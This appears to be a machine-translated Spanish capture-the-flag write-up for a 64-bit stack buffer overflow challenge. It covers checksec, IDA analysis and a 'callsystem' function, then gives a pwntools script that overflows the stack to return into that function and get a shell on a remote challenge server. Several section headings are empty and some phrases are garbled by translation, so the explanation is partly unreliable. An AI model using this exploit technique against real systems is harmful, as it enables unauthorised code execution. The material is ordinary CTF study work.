tema de análisis
Después de descargar primero el archivo con checksec comprobar el mecanismo de protección de archivos
Nombre de archivo es demasiado largo, se cambia un poco
Un programa de 64 bits se encuentra, el uso de pseudo-código de la vista ida
Nos dimos cuenta de un nombre de función especial callsystem
Aceptar idea, directa pila de desbordamiento
Recolección de información
La determinación de un desplazamiento
/ Dirección bin / sh
método 1
método 2
scripting
from pwn import *
p = remote('111.198.29.45',32366)
#p = process("./pwn001")
system = 0x400596
payload = "A"*0x80+"b"*8+p64(system)
p.sendlineafter("Hello, World",payload)
p.interactive()
prueba local
prueba de aviones no tripulados